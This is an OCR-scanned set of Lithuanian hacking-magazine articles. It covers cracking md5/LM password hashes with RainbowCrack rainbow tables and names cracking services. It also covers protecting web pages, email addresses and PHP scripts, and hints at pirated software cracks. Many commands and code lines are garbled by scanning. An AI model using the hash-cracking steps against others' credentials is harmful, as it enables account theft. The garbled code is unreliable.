dydį. Atkreipk dėmesį, kad lentelės „dydį“ aš suprantu kaip gran- 
dinių skaičių, tiek ir jų ilgi. kadangi abu šie parametrai turi įta- 
kos sulipimo dažniui ir padengimo efektyvumui. 

Helmano darbuose griežtai išvedama formulė, pagal kurią gali- 
ma apskaičiuoti P* kaip grandinių skaičiaus, jų ilgio ir aibės O 
elementų kiekio funkciją. Tai pakankamai galinga išraiška, kuri 
mus menkai domina, nes mums labiau rūpi, ką ji parodo. Tiesą 
sakant, nieko kardinaliai naujo: augant lentelės gabaritams, ti- 


Grandinių generavimas darbiniu režimu 


kimybė P* praktiškai nustoja augti. Dėl to norint efektyviai pa- 
naudoti šį metodą, būtina sukurti keletą lentelių, kurios būtų 
sugeneruotos nepriklausomu būdu. Šiuo atveju bendra sėkmės 
tikimybė (P) išreiškiama taip: P=1-(1—P*) “I, kur | — lentelių 
skaičius. Šią formulę labai lengva gauti iš paprasčiausių sam- 
protavimų: (1-P*) — tai tikimybė to, kad mes vienoje iš lentelių 
rakto nesurasime; (1-P*) “| — tikimybė, kad iš viso nerasim 
rakto nė vienoje iš I lentelių. Atitinkamai, atvirkštinio įvykio tiki- 
mybė yra P=1-(1-P*) "|. 

Derėtų pastebėti, kad ši formulė teisinga tik tuo atveju, jeigu 
užtikrinta lentelių generavimo nepriklausomybė, t.y. kiekvienai 
lentelei pasirinkta nuosava ir unikali apipjaustanti funkcija R. 


[Konkretūs dalykai] Manau, jog tai, ką aš tau papasakojau, 
bus pakankama, kad suprastumei praktiškesnius dalykus. Taigi 
susipažinkime su konkrečia programine įranga. išmokime su 
ja dirbti ir iš viso, išmėginkime tas lentelių vaivorykštes. Tiesą 
sakant, internete informacijos apie rainbow tables ne tiek ir 
daug; jeigu tu informacijos ieškosi Googlėj, ko gero, rasi tik 
vieną išsamią nuorodą — www.antsight.com/zsl/rainbowcrack. 
Tačiau drįstu tave patikinti, kad jos mums bus per akis! Tai 
projekto iškalbingu pavadinimu RainbowCrack svetainė, ku- 
rios pagrindinės vertybės slepiasi skyrelyje Downloads. Ten siū- 
loma parsisiųsti programą, su kuria galima generuoti raktų gran- 
dines ir po to su jau sudarytomis lentelėmis laužti konkrečius 
hešus. Čia taip pat pateikiami ir programos išeities tekstai, 
todėl jeigu tik nori ir turi reikiamos patirties, gali susipažinti su 
konkrečia visų šių dalykų, apie kuriuos mes prieš tai kalbėjo- 
me, realizacija. O mes šiame straipsnyje tiesiog išmoksime 
naudotis šia programa, ty. generuoti rainbow lenteles ir laužti 
hešus. Deja, man nepavyko programos sukompiliuoti FreeBSD 
sistemoje, todėl aš nusprendžiau visus eksperimentus atliki- 
nėti su Windows OS — laimė, svetainėje iš karto pateikiama 
paruošta vykdoma byla, todėl kankintis su kompiliavimu ne- 
reikia. Paskutinė sistemos versija — 1.2, ji palaiko darbą su 
LanManager, md5, sha1 hešais, taip pat leidžia vartotojui prie 


Bylos su hešų funkcijų aprašymais vidus 


Šis Maple skirtas skriptas padės tau paeksperimentuoti 


programos lengvai primontuoti nuosavus algoritmus, kurių nė- 
ra pagrindiniame sąraše. 

Iš svetainės parsisiuntęs archyvą, jame rasi keletą vykdomų by- 
lų. Dabar mus labiausiai domina rtgen — būtent ši programa 
generuoja simbolių grandines. Paleidžiant programą, jai būtina 
nurodyti visus reikiamus parametrus: 


niger Im alpha 17 0 2100 8000000 all 


Čia Im — tai hešo funkcijos pavadinimas, alpha — tai rakte 
leistini naudoti simboliai, šiuo atveju tai tiesiog lotyniškos rai- 
dės (ABCDEFGHUKLMNOPGRSTUVWXYZ). 1 ir 7 — tai mini- 
malus ir maksimalus rakto ilgis, 0 — lentelės identifikatorius, 
2100 — kiekvienos grandinės ilgis, o 8000000 — grandinių 
kiekis. Gana prasmingas klausimas: kodėl nurodyti būtent to- 
kie, o ne kiti skaičiai? Mūsų atveju šiai konfigūracijai tokie 
nustatymai optimalūs, jie užtikrina priimtiną generavimo bei 
paieškos laiką ir užimamos atminties kiekį. Tokių optimalių 
skirtingoms konfigūracijoms skirtų reikšmių paieška — nepa- 
prastas dalykėlis, tačiau mes su tavimi šio meno greitai iš- 
moksim. Juo labiau, kad mes tam turime visas priemones. 


[Parametrų analizė] Visų pirma reikia nustatyti, kokius para- 
metrus mes galime patobulinti ir ką jie paveikia. Visiškai aki- 
vaizdu, jog vartotojo parametrai (sėkmės tikimybė, užimamos 
atminties kiekis ir paieškos laikas) priklauso nuo grandinių ilgio 
t, jų kiekio m ir naudojamų lentelių skaičiaus /. Mes žinome, 
kaip per šiuos parametrus išreiškiama tikimybė P, tačiau kol kas 
nieko nekalbėjome apie tai, kaip nuo jų priklauso paieškos lai- 
kas T ir lentelių apimtis M. Su lentelių apimtimi viskas papras- 
ta, kiekviena grandinė aprašoma štai tokia struktūra: 


sud RainbawChain ( 
vint64 nlndas; 
int64 nlndex; 

až 


ži 


i 


ĮŽiĖi 


Ši 


Štai taip generuojama grandinė. Įrašomas tik pradinis ir galutinis raktai 


Taigi bendra lentelės iš m grandinių apimtis yra 16*m. Atitinka- 
mai jeigu lentelė tik viena, ji užima 16*m*! baitų. 

Hešo paieškos laikas išreiškiamas taip: t*t/(2*speed), kur spe- 
ed — hešų suradimo greitis. 

Dabar galima įvesti tam tikrus šių parametrų apribojimus, pa- 
vyzdžiui, kad md5 hešo originalo paieškos laikas būtų ne dides- 
nis nei 7000 sekundžių, o lentelės apimtis — ne didesnė nei 
10 Gb. Teoriškai pagal šiuos duomenis galima sukurti sritį, KU- 
rioje tenkinami visi įvesti apribojimai. Praktikoje iškyla proble- 
ma su skaitiniu tikimybinio paviršiaus apskaičiavimu. 


[Hešų nulaužimo servisai] Internete yra keletas entuziastų, 
kurie teikia nemokamas greito hešų dešifravimo paslaugas. Šie 
vaikinai nepagailėjo sisteminio laiko, atminties ir disko vietos, 
kad galėtų suteikti galimybę greitai nulaužti populiarius hešus. 
Pavyzdžiui, svetainėje md5 http:/passcracking.com galima per 
keletą valandų į gabalus sudraskyti md5 hešą. Tiesa, po to, kai 
apie šį servisą buvo parašyta slashdot naujienose, pareiškimų 
skaičius, o tai reiškia, kad ir laukimo laikas, smarkiai išaugo. 
Na, o jeigu tau reikia nulaužti LM HASH, keliauk į http://sar- 
caprj.wayreth.eu.org. 18750 lentelių megabaitai visą darbą pa- 
darys greitai ir kokybiškai. Per darbo laiką projekto šeimininkas 
prarado 1678875.57 sekundes sisteminio laiko ir padėjo iš- 
aiškinti 5445 hešus. 

Esmė tame, kad hešo aptikimo vienoje lentelėje tikimybė iš- 
reiškiama kaip 1-P(1-mliJ/N), kur P yra i, kintantis nuo 1 iki t, 
t.y. grandinių ilgiai; m/i] — naujų elementų skaičius i grandinė- 
je. mli] skaičiai apskaičiuojami iteratyviai, kiekviena tolimesnė 
reikšmė priklauso nuo ankstesnės, o galutiniame rezultate vi- 
sos jos priklauso nuo pradinės reikšmės. Pats supranti, jog to- 
kios konstrukcijos apskaičiavimas ir jos perskaičiavimas pasi- 
keitus pradinėms sąlygoms — labai darbui imli užduotis, prie 
kurios kompiuteris dirba iš tikrųjų ilgai. Apskaičiuoti, kaip pri- 
klausomai nuo grandinių kiekio, jų ilgio ir lentelių kiekio (net su 
dideliu žingsniu) keičiasi tikimybė -— visa tai trunka daug laiko. 
O ir šiaip, sudaryti trijų kintamųjų funkcijos grafiką — narkoma- 
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niška užduotėlė. Dėl to, norint sudaryti tikimybės grafiką, reikia 
iš eilės fiksuoti vieną iš kintamųjų, pavyzdžiui, lentelių kiekį. 
Suprantama, šiuo atveju protingas kiekis svyruoja tarp trijų— 
penkių. Jeigu mes užfiksuotume šį parametrą, tai jau būtų ga- 
lima sudaryti tikimybinį paviršių ir spręsti apie optimalius para- 
metrus. Netoli nuo čia pateiktoje nuotraukoje pavaizduotas to- 
kio paviršiaus pavyzdys, kurį aš suclariau su Maple. Ten aiškiai 
matomos dvi ašys — Mb ir t. Mb — tai lentelių dydis megabai- 
tais, t — grandinių ilgis. Pats paviršius pavaizduoja, kaip pri- 
klausomai nuo šių parametrų keičiasi tikimybė. Skerspjūvio 
plokštumos tikimybė lygi 0.95. Atitinkamai, norint patenkinti 
šią sąlygą, reikia pasirinkti visus taškus, kurie yra virš skerspjū- 
vio arba tiesiog ant paviršių susikirtimo linijos. Tuo pačiu tu gali 
rinktis, kuriam parametrui teikti pirmenybę — ar užimamai dis- 
ke vietai, ar paieškos laikui. Čia dar derėtų paminėti faktą, jog 
paieškos laikas apskaičiuojamas remiantis tuo, kad visa eina- 
ma lentelė yra kompiuterio atmintyje, t.y. priėjimo laikas, lygi- 
nant su hešo funkcijos apskaičiavimu, yra labai mažas. Tai rei- 
kia įvertinti, kadangi praktikoje viskas gali būti visiškai kitaip. 
Grįžtant prie parametrų, tikriausiai geriausia būtų rinktis aukso 
viduriuką — tą tašą, kur ir vieta, ir laikas naudojami santykinai 
mažai. Grafike ši vieta pažymėta kryžiuku. 


ĮPanaudojam lenteles] Taigi mes išsiaiškinome, kaip lentelių 
generavimui pasirinkti atitinkamus parametrus. O ar taip lengva 
jas sugeneruoti? Be abejo, tai visiškai nelengva, kadangi tam 
vėl sugaištama daugybė laiko. Juk grandinei iš 2000 elementų 
sudaryti reikia tiek pat kartų apskaičiuoti funkcijos reikšmę. Prak- 
tikoje tai gali trukti paras, savaites ir net metus. Vieną kartą 
padarius šį darbą sugeneruotas lenteles bus galima naudingai 
realizuoti arba panaudoti savo paties reikmėms. Savaime su- 
prantama, dėl nuosavų lentelių generavimo galvos galima ir ne- 
sukti, nes jas galima tiesiog nusipirkti už 500 dolerių. 

Dabar aš papasakosiu, kaip panaudoti jau sugeneruotas lente- 
les. Visų pirma, siekiant padidinti paieškos greitį, jas reikia su- 
rūšiuoti su įrankiu rtsort, kuriam vietoje parametro reikia tiesiog 
perduoti bylos su lentele pavadinimą. Po to jau galima paleisti 
įrankį rcrack, kuris, tiesą sakant. ir lauš tavo hešą, ieškodamas 
Jo iš anksto sugeneruotose lentelėse. Rerack paleidžiamas štai 
taip: 


rarodk ".1t -h 50414020bc4b2076697194911017692 


Vietoje *.rt galima nurodyti konkrečius bylų su lentelėmis pava- 
dinimus. Jeigu tau reikia nulaužti ištisą bylą su hešais, tiesiog, 
po vėliavėlės -/ nurodyk šios bylos pavadinimą. 


[Pabaiga] Na štai, ko gero, tai viskas, apie ką aš tau norėjau 
šiandien papasakoti. Dabar tu bent jau tiksliai Žinai, kaip veikia 
šios vaivorykštinės lentelės, kokia programinė įranga skirta joms 
sukurti, naudoti ir kaip su jomis laužti hešus. Juk vakar tu apie 
tai greičiausiai neturėjai nė žalio supratimo, tiesa? Taigi aš pa- 
dariau ką galėjau. Jeigu tave sudomino ši tema, aplankyk mano 
nurodytas svetaines ir išstudijuok ten esančią medžiagą, kuri 
tau tikrai padės. Dar reikia pasakyti, jog kai kuriuos svarstymus 
aš pateikiau truputį perdėtai, o iš tikruju pateiktas modelis šiek 
tiek skiriasi nuo to, kas naudojama pačiame RainbowCrack. 
Tačiau taip ir turėtų būti — tarp teorijos ir praktikos visada yra 
nedidelis tarpeklis. 


[Kaip prie programos 

pridėti savo hešo funkciją] 
Tiesiog klausimas iš FAO :). Iš tiesų, 
tai aktuali problema. Kūrėjai į p. 
laikomų funkcijų sąrašą įtraukė tik 
tris pačius populiariausius algorit- 
mus: md5, Im ir shal. Norint pri 
dėti kokį nors kitą algoritmą, reikia 
šiek tiek pakeisti RainbowCrack iš- 
eities tekstus. Atsidaryk bylą H- 
hRoutine.cpp ir prie jos pridėk šias 
eilutes: 


(HoshRoutine-:(HoshRoutine[) 


i 
AddHashRoutine("awnhosh“, CoolHosh, 16); 


AddHashRoutine Iunkcijos protolipos: 
void AddHashRautine(sting sHashRoutinekame, 
HASHROUTINE pHiashRoutine, int nHashlen), 


Čia sHoshRourinaMame — pridedamo algoritmo 
pavadinimas, beje, kaip rašo dokumentacija, Ūo nš- 
detėtų naudot „“ simbolio; nHashlen — gėnė- 
nuojamo hešo ilgis; pHashRauline — rodyklė į hešo 
funkciją 

typeda! void (*HASKROUTINE) (unsigned char“ 
pPloin, int nPloinkan, unsigned char“ pask); 


Čia pPlain — šifruojamas tekstas, 
nPlainLen — šios eilutės ilgis, 0 
pHash — nuoroda, kur įrašomos 
hešų funkcijų reikšmės. Savaime Su- 
prantama, taip pat reikia aprašyti 
pačią hešo funkciją CoolHash. Ge- 
rausia tai daryti kartu su kitomis 
HashAlgorithm.cpp byloje esančio- 
mis funkcijomis, prototipą patalpi- 
nant į HashAlgorithm.h. 

Po to reikia perkompiliuoti Rain- 
bowCrack ir išbandyti pridėto algo- 
ritmo veikimą, kas daroma štai taip: 


rigen owuhash lowerolpha | 7 0 100 16 test 
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Skydas „web“ turiniui 

„Web“ turinio apsaugos metodai ir 
technologijos ą 
VAGYSTĖ GLOBALIAME TINKLE IŠTOBULIN- 
TA DAR LABIAU NEI REALIAME GYVENIME. 
INTERNETE VAGIAMA VISKAS: SLAPTAŽO- 
DŽIAI, /CĘ UINAI, PAŠTO DĖŽUTĖS, KORES- 
PONDENCIJA, WEB DIZAINAS, PAVEIKSLIU- 
KAI IR KITŲ PROGRAMŲ IŠEITIES TEKSTAI. 
LABAI SUDĖTINGA NUO VAGYSTĖS IR NE- 
TEISĖTO NAUDOJIMO APSAUGOTI TAI, KAS 
IŠ PRIGIMTIES IR IŠ ESMĖS TURI BŪTI PRI- 
EINAMA DAUGELIUI ŽMONIŲ. VIS DĖLTO SU- 
DĖTINGA — TAI NE „NĘĮMANOMA“ SINONI- 
MAS. ŠIANDIEN MES ISMOKSIME NUO VA- 
GYSTĖS APSAUGOTI HTML PUSLAPIŲ KO- 
DĄ, GRAŽIĄ GRAFIKĄ, PAVEIKSLIUKUS IR 
NET PHP SISTEMŲ IŠĖITIES TEKSTUS. 


[Apsauga nuo pačių mažiausiųjų] Daugelis vartotojų 
vienaip ar kitaip paties dizaino pavogti nenori. Jie pa- 
geidauja nusikopijuoti teksto fragmentą, išsaugoti pa- 
veikslėlį arba pasilikti atminčiai HTML fragmentą. Pir- 
miausia mes kovosime būtent su tokiais vartotojais, ka- 
dangi jų dauguma. 

Visų pirma, jeigu tu nenori, kad vartotojas peržiūrė- 
tų puslapio išeities tekstą, būtinai uždrausk jo ke- 
šavimą į diską. Tai reiškia, kad kai vartotojas aplan- 
kys tam tikrą puslapį, jis nebus išsaugotas keše. Tu 
tikriausiai žinai, kaip tai padaryti, tačiau aš vis dėlto 
priminsiu šią opciją, kuri turėtų būti <head> </he- 
ad> bloke: 


< META HTTP-EOUIV  Cache-Contro! content= no-cache > 


Antra, galima apsisaugoti su JavaScript, kuri leidžia draus- 
ti teksto kopijavimą iš HTML puslapio. Mūsų dienomis 
šis metodas labai madingas, tačiau prieš ji naudoda- 
mas susimąstyk, ar jis neatbaidys tavo lankytojų. Jeigu 
tu vis dėlto nusprendei naudoti tokį būdą, į tą patį ant- 
raštės bloką pridėk šį skripta: 


< SCRIPT LANGUAGE = "JavaScript" > 
documeni.ondragstart = test; 
document.onselecstait = test; 
documen!.oncontextmenu = test; 
funcion tesi() ( 

telum lalse 


1 
/SCRIPT > 


Trys į funkciją test() nukreipiantys įvykiai seka perkėlimą (drag). 
elementų išskyrimą (select start) bei kontekstinio meniu iškvie- 
timą. Kaip matai, pati funkcija — paprasčiausia tuščia paprog- 
ramė, grąžinanti false reikšmę. 


[Adresai pavojuje] Pastaruoju metu piktavalius ėmė nesveikai 
dominti HTML puslapių išeities tekstai. Vis dėlto šį susidomėji- 
mą sukelia ne dizaino grožybės, o elektroninio pašto adresų 
buvimas. Aš kalbu apie paprasčiausius spamerius, kurie į inter- 
neto platybes paleidžia savo šnipinėjančius voriukus. Pastara- 
sis tikrina kiekvieną svetainės nuorodą ir išsaugoja visus ten 
sutiktus elektroninio pašto adresus. Dėl to išmintingieji dizai- 
neriai sugalvojo nemažai gudrybių, leidžiančių apsisaugoti nuo 
tokių užpuolimų. 


[INFO] Nepaisant visų pažadų, kai kurios programos HTML šir- 
ruoja taip, kad po to su kai kuriomis naršyklėmis pasirodo klai- 
dos. Aš pats pastebėjau, kad po HTML Power pas mane nusto- 
jo veikti su JavaScript sukurtas navigacinis meniu. Beje, su IE 
tokių klaidų pamatyti neteko. 


Pirmasis ir pats paprasčiausias apsisaugojimo metodas — pa- 
naudoti unicode simbolius, kuriuos supranta daugelis naršyk- 
lių. Paprastam vartotojui šis adresas atrodys normaliai, o HTML 
puslapio išeities tekstuose jis bus užkoduotas. 

Aptarkime paprastą pavyzdį. Tarkim, forumo puslapyje yra elek- 
troninio pašto adresas forb(Dreal.xakep.ru. Aš nenoriu, kad mane 
užknisinėtų spameriai (į mano pašto dėžutę kiekviena dieną 
atkeliauja apie 200 spamo laiškų :)), todėl su forumo autoriu- 
mi dosniai pasidalinau unicode kodavimo metodu. Taigi adre- 
sas pateikiamas tokia eilute: 


<a href= "HorbCDreal.xakep.ru" > forb(eDreal.xakep.tu < /1 > 


Mūsų užduotis — užkoduoti parametro href reikšmę, kadangi 
spamerių voriukai grobia būtent jį. Visus simbolius galima pa- 
keisti konstrukcija 844:NUM;, kur NUM — Koks nors skaičius. 
Pavyzdžiui, mano adresą galima užkoduoti taip: 


RAVZRAMAA14:R98;87664:84114:84101;8497:RA 1088 
PA6RA20RA9TRAOTRA10L8112:84684114,8+117, 


Tačiau gali būti taip, kad priešo robotas periminės teksto lauką 
(<a></a> blokas), todėl puslapyje iš viso nereikia rodyti jokių 
pašto adresų, 0 tiesiog, tarkim, adresą pakeisti forume naudo- 
Jamu slapyvardžiu. Vualia, konstrukcija pavirsta kažkuo pana- 
šaus į: 


<a hief="8410284111;8114;898;8464;84114;84101;8497,841 
OB RA A6 RA 120 R A9TA E 1OTR AA ORE 12 46:84 48117 > Parb/ 
> 


Dabar net patį stipriausią robotą ištiks infarktas, 0 jo šeiminin- 
kas graberio loguose labai ilgai dešifruos slaptus rankraščius. 
Juokauju Mūsų laikais jau yra tokių voriukų, kurie unicode 
dešifruoja veikimo metu (on-the-fly). Tačiau ne viskas taip blo- 
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gai, kadangi šis būdas nėra vienintelis ir nepakartojamas. Kie- 
tesniam adreso kodavimui galima naudoti JavaScript. 


Mūsų laikais jau yra tokių voriukų, kurie „unicode“ dešifruoja 
veikimo metu. 


<hedd> 

<itlo > Apsauga nuo spamo < /tille > 
<saipt longuoge = “IavaScript" > 
funcion emai (ogin, domain) 


mail — login > "2" + domain; 

document write (mail); 

</stipt> 

</head> 

<body> 

E-mall 
Sciipt > email("forb","real.xakep.tv" |; < /saript> 
/hody> 


Štai labai paprasta ir tobula apsauga, kurią spameriškas botas 
vargu ar įveiks. Manau, kad mintis tau aiški: kai reikia spaus- 
dinti elektroninio pašto adresą, iškviečiama funkcija mail(), ku- 
riai perduodamas vartotojo vardas ir pašto domenas. Funkcijo- 
je ši informacija sujungiama su eta ((8), po ko išvedime gauna- 
mas veikiantis pašto adresas. Tokio tipo apsaugą apeiti nėra 
paprasta, todėl voriukai tokius realius adresus ignoruoja, tai yra 
„nepastebi“. 

Galų gale galima pabandyti modernizuoti skriptą, į jį įjungiant 
koki nors papildomą kodavimą arba sukergti jį su unicode ap- 
sauga, Čia tu pats sau architektas :). 

Dabar ypač išpopuliarėjo programavimo kalbos Perl ir PHP su 
kuriomis taip pat galima apsisaugoti nuo virtualių niekšelių. Pir- 
mas į galvą atėjęs dalykas — tai panaudoti nesudėtingą skrip- 
tą, kuris dalyvio registracijos metu jo pašto adresą įtrauktų į 
specialią bazę. Kiekvienas adresas turi turėti unikalų numerį. 
Po to kaip „href“ parametras patalpinama nuoroda į skriptą su 
šiuo numeriu, 0 pastarasis paleidžia pašto programą arba tie- 
siog atvaizduoja reikiamą adresą. Kaip pavyzdį pateiksiu kon- 
strukciją, kuri realiai gali būti panaudota tavo HTML puslapyje: 


a Aref=/cgi-bin/mail.pl?31337 > Forb < /1 > 


Nuspaudus nuorodą ant mano slapyvardžio, iškviečiamas skrip- 
tas, kuris parodo pašto adresą arba paleidžia pašto programą 
(web sąsają), kuri tau leis išsiųsti tavąjį laiškelį :). 


ĮPrograminis rojus] Lengva suprasti, kad visą HTML turinį ga- 
lima apsaugoti panaudo- 
jant tam tikrą kodavimą, 
kuomet dokumento kūnas 
tam tikru būdu šifruoja- 
mas, 0 prieš atvaizdavimą 
vartotojui dešifruojamas 
su JavaScript užkrovikliu.. 
Visa tai papildomai gali 
būti sumaišyta ir supai- 
niota, kad būtų neįmano- 


ni Ti 
La IE eina ni Marna na 
El pašto adreso kodavimas: 


El pačto adresas 


Patnaesi TTT 


Patankinė adresų kodavimo priemonė 


ma susigaudyti keistų 
simbolių mišrainėje. Sa- 
vaime suprantama, pro- 
gramuotojai jau sukūrė 
daugybę programų, kurios 
visą šį darbą padaro už ta- 
ve. Kiekviena tokia progra- 
ma turi savų privalumų ir 
trūkumų, todėl iš didelio 
įrankių asortimento aš Iš- 
rinkau viso labo tris, kurių 
galimybes dabar ir apra- 
šysiu. 
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žaidžiame su HTML Power tagais 


1. „Encrypt HTML Pro“ (w.Atmlpassword.com/downloadl/enchp.zip). 
Gana paprasta ir funkcionali programa Encrypt HTML Pro leidžia už- 
šifruoti visą arba tam tikrą HTML puslapio dalį. Paleidus programa 
jai būtina sušerti vieną arba keletą bylų (žingsnis Files), po to reikia 
pasirinkti šifravimo sritį (<body> sekcija, visas puslapis, nuorodos, 
elektroninio pašto adresai ir panašiai). Po to dėmesį derėtų skirti 
JavaScript skyreliams, kurie leidžia uždrausti dešinio pelės klavišo 
paspaudimą, puslapio spausdinimą ir panašiai. Galutiniame žings- 
nyje tu gausi užšifruotą HTML puslapį. Be abejo, viskas labai šaunu, 
tačiau programa turi du trūkumus. Visų pirma, už ją prašoma net 30 
žaliųjų prezidentų, o antra, HTML puslapio dydis padidėja 5 kartus. 
Tačiau, kaip žada šios programos gamintojai, užšifruotą HTML pus- 
lapi korektiškai galės atvaizduoti bet kuri naršyklė. 


2. „HTML Power“ (www.pullsoft.com/HTMLPower SETUPexe). 
Šio produkto kūrėjai HTML Power pavadino svetainės kom- 
pleksinės apsaugos priemone. Iš tiesų šios programos gali- 
mybės mažai kuo skiriasi nuo Encrypt HTML, nebent skyre- 
liais, kurie čia išdėstyti ne vertikaliai, o horizontaliai :). Beje, 
man vis dėlto pavyko surasti tris skirtumus. Užšifruoto pusla- 
pio dydis čia gaunamas mažesnis už generuojamą konkuren- 
to HTML Power — iš viso 3 kartus daugiau už pradinį. Taip 
pat galima pastebėti skyrelį Meta Tags. kuriame nurodomi 
šifravimo nereikalaujantys tagai. Tarkim, tu HTML puslapyje 
įrašei konstrukciją <h1>Aš kietas hakeris</h1> ir užsima- 
nei, kad puslapio išeities tekstuose šis užrašas būtų mato- 
mas atviru tekstu. Atitinkamai | šį skyrelį derėtų pridėti du 
tagus <h1></h1> ir, kaip sakoma, efektas bus garantuo- 
tas :). Beje, naudinga čia įtraukti <title> </title> tagus, kad 
paieškos robotai sėkmingai indeksuotų puslapį. 

Ir dar vienas malonus niuansas. Programoje yra galimybė užšif- 
ruotą bylą apsaugoti slaptažodžiu. Vėliau išeities tekstą galima 
atstatyti pagal šį slaptažodį, skyrelyje Encrypt Tags pasirinkus 
atitinkamą opciją. 

Savaime suprantama, už programą prašoma pinigų, tačiau iš- 
ganingieji vaistukai guli atitinkamose svetainėse ir laukia akty- 
vavimo akimirkos. Tik aš tau apie tai nieko nesakiau :). 


3, „HTML Protector“ (http://antssoft.fileburst.com/htmlprotector.zip). 
Atrodytų, kad programa panaši į jau aprašytus produktus, ta- 
čiau aš pagalvojau, kad HTML Protector galimybes vis dėlto rei- 
kėtų aprašyti. Be viso kito, programa moka apsaugoti paveiks- 
lėlius. Čia siūloma keletas metodų. Programa paveikslėlį gali 
suskaidyti į keletą dalių, tuo pačiu užkirsdama kelią jo parsiun- 
timui. Paveikslėlį taip pat galima sukonvertuoti į swf tipo bylą, 


rivers lankytoją sumišti (tačiau greičiausiai tik nauj 
us). Ir mėgstamiausias apsaugos metodas — ant paveiksliuko 
su nurodytu skaidrumo lygiu uždėti vandens ženklą arba prekinį 
ženklą. Be viso kito, Protector ant visų paveikslėlių gali uždėti 
kitą, tavo nurodytą paveikslėlį. Vargu ar tokį šedevrą kas nors 
audos kituose šaltiniuose. Savaime suprantama, skyrelyje In: 
put reikia užkrauti visą www svetainę, įskaitant paveikslėlius. 


[Zodis apie skriptus] Stai tu ir išmokai apsaugoti savo web pro- 
jektus, elektroninio pašto adresus ir paveikslėlius. Tačiau yra dar 
vienas pavojus — skriptų vagystė. Įsivaizduok, kad tu turi virtualų 
serverį, jame tu visam pasauliui pateiki savo naują PHP varikliuką, 
kurį su savo draugu kūrei dvejus metus ir kuriame įgyvendinai daug 
galimybių ir sudėtingų funkcijų. Savaime suprantama, kad tu rim- 
tai sunerimęs, kad koks nors ilgapirštis hakeris gali paprasčiausiai 
nulaužti tavo serverį ir nugvelbti brangius išeities tekstu: 
Specialiai tau Zend programuotojai, kurie, be viso kito, kuria PHP 
branduolį, sukūrė sistemą Zend Encoder, kuri iš bet kokio PHP 
skripto gali tau pagaminti dvejetainę 
bylą, vykdomą su Zend Optimizer. Ši 
sąsaja jau senų senovėje tapo ko- 
mercinių programų standartu ir yra 
aktyviai naudojama. Tuo pačiu siste- 
ma pakankamai patikima, stabili, jai 
patikimi patys brangiausi skriptai ir 
programos. Vienintelis trūkumas 
šios sistemos naudojimas kainuoja 
pinigus. Dėl to mums su tavimi ji ne: 
labai tinka. Mes pasinaudosime kitu 
šauniu sprendimu — programa 
w. php, screw lengvai sukergiama su php mod'u ir pui 
kiai šifruoja bet kokius skriptus. Apache nesunkiai atpažįsta neaiš- 
kius išeities tekstus, o jeigu įsilaužėlis iš tavęs ir nugvelbs varikliuko 
struktūrą, atstatyti išeities tekstus jam bus labai sudėtinga. 
Pasitreniruokime ir įdiekime programą į serverį. Visų pirma par- 
sisiunčiame php screw (htip://prdownloads.sourceforge.net/ 
php-screw/php screw-1.3.tgz) ir konfigūruojame programą. Po 
to šiek tiek pakeisime byloje php screw.h aprašytus kodavimo 
raktų ilgius. Tiesiog 5 skaičius pakeisk į bet kokią kitą reikšmę, 
kad tavo raktai nebūtų sukonfigūruoti pagal nutylėjimą. Po to 


php 


Last Step 


Press "Protact button to protect html le, You can tast the selected file by 
sleking "Test" button, or view sourcs by Glieking "View sauros" bukten 


a= 


[Tenai T 


Tu | 
CET 


Eliek "Protas" button to pratsct web ios 


1 We || R Reginos L 


Imo procesas 


programą galima kompiliuoti su komanda make 
Dabar prasideda įdomioji dalis. Paruoštą modulį php 
nukopijuok į katalogą, kuriame yra php (pas mane tai /usr/lib, 
php4). Po to į bylą php.ini Iji yra ten pat) pridėk eilutę „exten- 
sion=php screw.so“. Ir pabaigai perkrauk Apache. Nuo šios aki- 
mirkos web serveris gali suprasti programos užšifruotą php ko- 
dą. Teliko tik sugeneruoti keletą sudėtingų skriptų :). Tai daro- 
ma su komanda „screw /kelias/iki/skriptų/katalogo“. Tačiau at- 
mink, kad screw vykdomą bylą reikia iš anksto sukompiliuoti 
kataloge tools, paleidžiant komandą make. Visi užkoduoti skriptai 
bus sukurti tame pačiame kataloge, o originalai bus išsaugoti 
tokiu vardu: script. php.screw. 

Aš šį įrankį patikrinau savo serveryje ir jis man labai patiko. Tiesa 
man kol kas nėra poreikio šifruotis, kadangi savo svetainėje aš 
nelaikau nieko, išskyrus viešą forumą vBulletin. Tačiau aš įsitiki- 
nęs, kad pas tave yra kietesnių už paprastą forumą projektu :) 


Screw.SO 


ĮPats save apsaugok] Stai ir visas penas pamąstymams 
Tu gali tiesiog dabar parsisiųsti visą reikiamą programinę įran 
ga ir apsaugoti savo svetainę bei visus PHP skriptus. Tačiau 
geriau neskubėti ir pagalvoti apie apsaugos produktyvumą 
našumą. Viena vertus, niekas iš tavęs nenugvelbs tavo „nuo 
savybės“, o kita vertus, visiškai nebūtina šifruoti viso ko- 
do, juk tai galutinį puslapį padidins 7-10 kartų. Prot 
būtų apsaugoti atskirus kodo fragmentus ir svarbius pavėi 
lėlius, kurie gali būti įdomūs kitiems, ne tokiems talentir 
giems web dizaineriams 


S. 


blokavimas 
mano 
Ųų nau- 


apsaugos metodą. Tai dešiniojo pelės klavišo 

kūrėjai tiki jo efektyvumu, kadangi 

nuomone, jis gali apsaugoti nebent nuo pačių žaliau 
ų. O štai ir skriptas, kuri 


language = JavaSaip 
i (document al) 


SCRIP) 


Manau, tu 
ėje pasirinkus „View -> Source“ arba nuspaudus ati- 
tinkamą klavišą įprastinėje klaviatūroje. Egzistuoja dar vie 
nas apsaugos būdas prieš HTML dizaino vagis. Žinovai 
rekomenduoja naudoti Java iškvietimą window.open(URL) 
kartu su dešiniojo pe paudimą blokuojan- 
u skriptu. eju vienintelė galimybė pri ti Iki 
nuspausti karštąjį klavišą arba specialų 
klavia mygtuką. Analitikų nuomone, tai žmon 
įvesti į suktuką. Tačiau aš manau, kad tokio tipo metodai 
veiksmingi r ijokėliu 


Ipranti, kad apeiti tokią ap: 


gali 
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A 
SURASTI PA- 

ŽEIDŽIAMĄ SERVISĄ IR TEL- 

SINGAI PARINKTI EKSPLOITĄ NELENGVA. IR 

VIS DĖLTO KUR KAS SUDĖTINGIAU PAČIAM PARAŠY- 

TI ŠĮ EKSPLOITĄ, PAVERČIANT BLANKIĄ BUGTRAO'E PA- 
SIRODŽIUSIĄ NAUJIENĄ REALIAI VEIKIANČIU DAIKTU. Š 

DIEN AŠ TAU NEPASAKOSIU, KAIP REIKIA RAŠYTI EKSPLOI- 
TUS, IR NET NEAPTARINĖSIU POPULIARIŲ PROGRAMINĖS ĮRANG 
